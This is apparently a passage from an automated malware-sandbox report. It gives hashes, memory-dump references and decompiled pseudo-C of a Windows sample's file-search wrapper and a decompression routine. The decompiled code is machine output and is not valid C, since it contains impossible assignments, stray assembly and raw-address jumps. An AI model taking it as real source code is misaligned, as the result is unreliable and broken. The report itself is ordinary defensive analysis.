                                                  • Instruction Fuzzy Hash: 77B09232084218BBEB002B91DC49B587F68FF04B52F84C010F64E44861CBB2D4108A92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405B25(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405BC7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                  0x00402689
                                                  0x0040269d
                                                  0x004026a8
                                                  0x004026a9
                                                  0x004027e4
                                                  0x0040268b
                                                  0x0040268b
                                                  0x0040268d
                                                  0x0040268f
                                                  0x0040268f
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                  • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                                  • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                  • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406354, Relevance: .3, Instructions: 334COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E00406354(signed int __ebx, signed int* __esi) {
				signed int _t367;
				signed int _t396;
				signed int _t413;
				signed int _t414;
				signed int* _t417;
				void* _t419;

				L0:
				while(1) {
					L0:
					_t417 = __esi;
					_t396 = __ebx;
					if( *(_t419 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t414 = _t413 | 0xffffffff;
							 *_t417 = 0x11;
							L10:
							_t417[0x147] =  *(_t419 - 0x40);
							_t417[0x146] = _t396;
							( *(_t419 + 8))[1] =  *(_t419 - 0x34);
							L11:
							 *( *(_t419 + 8)) =  *(_t419 - 0x38);
							_t417[0x26ea] =  *(_t419 - 0x30);
							E00406AC3( *(_t419 + 8));
							return _t414;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L159;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073e8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073e8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L157:
									_t367 =  *_t417;
									if(_t367 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t367 * 4 +  &M00406A83))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L157;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L157;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L157;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L157;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L157;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											_push(__esi);
											__al = __al | 0x0000008b;
											asm("enter 0xce2b, 0x81");
											goto 0x4083ec;
										case 6:
											L133:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L149:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L134:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L140:
												__esi[0x26ea] = __edi;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L160;
												} else {
													goto L149;
												}
											}
											L135:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L140;
											}
											L136:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L149;
											} else {
												goto L140;
											}
										case 7:
											L150:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t351 = __ebp - 0x38;
												 *_t351 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t351;
											}
											goto L152;
										case 8:
											L4:
											while(_t396 < 3) {
												if( *(_t419 - 0x34) == 0) {
													goto L159;
												} else {
													 *(_t419 - 0x34) =  *(_t419 - 0x34) - 1;
													 *(_t419 - 0x40) =  *(_t419 - 0x40) | ( *( *(_t419 - 0x38)) & 0x000000ff) << _t396;
													 *(_t419 - 0x38) =  &(( *(_t419 - 0x38))[1]);
													_t396 = _t396 + 8;
													continue;
												}
											}
											_t396 = _t396 - 3;
											 *(_t419 - 0x40) =  *(_t419 - 0x40) >> 3;
											_t377 =  *(_t419 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t379 = _t377 >> 1;
											_t417[0x145] = ( ~(_t377 & 0x00000001) & 0x00000007) + 8;
											if(_t379 == 0) {
												L24:
												 *_t417 = 9;
												_t407 = _t396 & 0x00000007;
												 *(_t419 - 0x40) =  *(_t419 - 0x40) >> _t407;
												_t396 = _t396 - _t407;
												goto L157;
											}
											L6:
											_t382 = _t379 - 1;
											if(_t382 == 0) {
												L13:
												__eflags =  *0x42dbb8;
												if( *0x42dbb8 != 0) {
													L22:
													_t383 =  *0x40942c; // 0x9
													_t417[4] = _t383;
													_t384 =  *0x409430; // 0x5
													_t417[4] = _t384;
													_t385 =  *0x42ca34; // 0x0
													_t417[5] = _t385;
													_t386 =  *0x42ca30; // 0x0
													_t417[6] = _t386;
													L23:
													 *_t417 =  *_t417 & 0x00000000;
													goto L157;
												} else {
													_t26 = _t419 - 8;
													 *_t26 =  *(_t419 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t387 = 0x42ca38;
													do {
														L15:
														__eflags = _t387 - 0x42cc74;
														_t409 = 8;
														if(_t387 > 0x42cc74) {
															__eflags = _t387 - 0x42ce38;
															if(_t387 >= 0x42ce38) {
																__eflags = _t387 - 0x42ce98;
																if(_t387 < 0x42ce98) {
																	_t409 = 7;
																}
															} else {
																_t409 = 9;
															}
														}
														L20:
														 *_t387 = _t409;
														_t387 = _t387 + 4;
														__eflags = _t387 - 0x42ceb8;
													} while (_t387 < 0x42ceb8);
													E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t419 - 8);
													_push(0x1e);
													_pop(_t411);
													_push(5);
													_pop(_t390);
													memset(0x42ca38, _t390, _t411 << 2);
													_t421 = _t421 + 0xc;
													_t413 = 0x42ca38 + _t411;
													E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t419 - 8);
													 *0x42dbb8 =  *0x42dbb8 + 1;
													__eflags =  *0x42dbb8;
													goto L22;
												}
											}
											L7:
											_t394 = _t382 - 1;
											if(_t394 == 0) {
												 *_t417 = 0xb;
												goto L157;
											}
											L8:
											if(_t394 != 1) {
												goto L157;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L159;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L159;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L157;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L160;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L159;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L159;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L152:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L160:
												__edi = 0;
												goto L10;
											} else {
												L156:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L161:
													0 = 1;
													goto L10;
												}
												goto L157;
											}
									}
								}
								L158:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L159:
				_t414 = 0;
				_t417[0x147] =  *(_t419 - 0x40);
				_t417[0x146] = _t396;
				( *(_t419 + 8))[1] = 0;
				goto L11;
			}









                                                  0x00406354
                                                  0x00406354
